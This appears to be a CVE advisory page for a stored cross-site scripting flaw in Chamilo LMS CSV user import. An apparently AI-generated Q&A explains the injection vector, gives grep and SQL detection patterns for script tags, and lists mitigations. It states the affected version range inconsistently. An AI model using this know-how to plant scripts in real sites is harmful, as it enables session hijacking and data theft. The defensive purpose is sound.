CVE-2025-52468
Stored XSS in Chamilo User Import Allows Script Execution
Publication date: 2026-03-02
Last updated on: 2026-03-03
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| chamilo | chamilo_lms | to 1.11.30 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': 'CVE-2025-52468 is a high-severity stored cross-site scripting (XSS) vulnerability in the Chamilo learning management system versions up to 1.11.28. It occurs due to insufficient input validation and sanitization of user data imported via CSV files, specifically in the "Last Name," "First Name," and "Username" fields.'}, {'type': 'paragraph', 'content': "Attackers can embed malicious JavaScript payloads within these fields during CSV import. These payloads are stored in the database and execute when an authenticated user views the compromised user profile, allowing malicious scripts to run in the context of that user's session."}, {'type': 'paragraph', 'content': 'This can lead to session hijacking, data theft, or other malicious actions. The vulnerability can also be exploited by unauthenticated users through the "Who is Online" page if a malicious user is online. The issue was patched in Chamilo version 1.11.30.'}] [1]
How can this vulnerability impact me? :
[{'type': 'paragraph', 'content': 'This vulnerability can have serious impacts including the execution of malicious scripts in the context of authenticated users, which may lead to session hijacking, theft of sensitive data, and unauthorized actions within the Chamilo LMS.'}, {'type': 'paragraph', 'content': 'Because the attack vector is network-based and requires no privileges, an attacker can exploit this by importing a malicious CSV file and then tricking users into viewing infected profiles.'}, {'type': 'paragraph', 'content': 'Additionally, unauthenticated users can exploit the vulnerability via the "Who is Online" page if a malicious user is online, broadening the attack surface and increasing risk.'}, {'type': 'paragraph', 'content': 'Overall, this can compromise confidentiality, integrity, and availability of the system, potentially disrupting learning activities and exposing user data.'}] [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking for the presence of malicious JavaScript payloads embedded in user data fields such as "Last Name," "First Name," and "Username" that were imported via CSV files.'}, {'type': 'paragraph', 'content': 'One practical approach is to review imported user data for suspicious script tags or encoded JavaScript payloads.'}, {'type': 'paragraph', 'content': 'Since the vulnerability triggers when viewing user profiles, monitoring HTTP requests to user profile pages for unusual script execution or unexpected payloads can help detect exploitation.'}, {'type': 'paragraph', 'content': 'Commands to assist detection might include searching the database or exported CSV files for typical XSS patterns such as <script> tags or event handlers.'}, {'type': 'list_item', 'content': "Use grep or similar tools to scan CSV files or database exports for suspicious strings, e.g.: grep -iE '<script|onerror|onload|javascript:' users.csv"}, {'type': 'list_item', 'content': "Query the database for user fields containing script tags or suspicious payloads, for example in SQL: SELECT id, username, firstname, lastname FROM users WHERE firstname LIKE '%<script%' OR lastname LIKE '%<script%' OR username LIKE '%<script%';"}, {'type': 'paragraph', 'content': 'Additionally, monitoring web server logs for unusual requests to whoisonline.php or user profile pages that might indicate attempts to trigger the XSS payload can be useful.'}] [1]
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'The primary immediate mitigation step is to upgrade Chamilo LMS to version 1.11.30 or later, where this vulnerability has been patched.'}, {'type': 'paragraph', 'content': 'If upgrading immediately is not possible, avoid importing user data via CSV files until the patch can be applied.'}, {'type': 'paragraph', 'content': 'Review and sanitize any existing user data imported from CSV files to remove potential malicious scripts from the "Last Name," "First Name," and "Username" fields.'}, {'type': 'paragraph', 'content': 'Limit access to the user import functionality to trusted administrators only.'}, {'type': 'paragraph', 'content': 'Monitor user profiles and the "Who is Online" page for suspicious activity or unexpected script execution.'}] [1, 2]